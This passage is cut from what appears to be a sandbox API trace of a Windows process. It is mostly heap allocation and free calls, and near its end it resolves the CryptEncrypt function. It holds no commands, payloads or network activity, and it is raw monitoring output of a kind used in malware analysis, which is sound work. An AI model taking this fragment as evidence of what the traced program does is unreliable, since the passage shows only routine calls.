Size=0x4) returned 0x2e54d18 [0250.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4e0) returned 0x2f38ec8 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0250.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0250.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0250.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0250.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0250.689] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4dc) returned 0x2e7f320 [0250.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4dc) returned 0x2e8b808 [0250.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0250.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0250.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0250.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8b808 | out: hHeap=0x970000) returned 1 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.731] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.731] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0250.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0250.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0250.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0250.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0250.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4dc) returned 0x2e7f320 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0250.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0250.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0250.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0250.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0250.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0250.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0250.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0250.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0250.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51af0 [0250.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51af0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0250.740] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0250.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 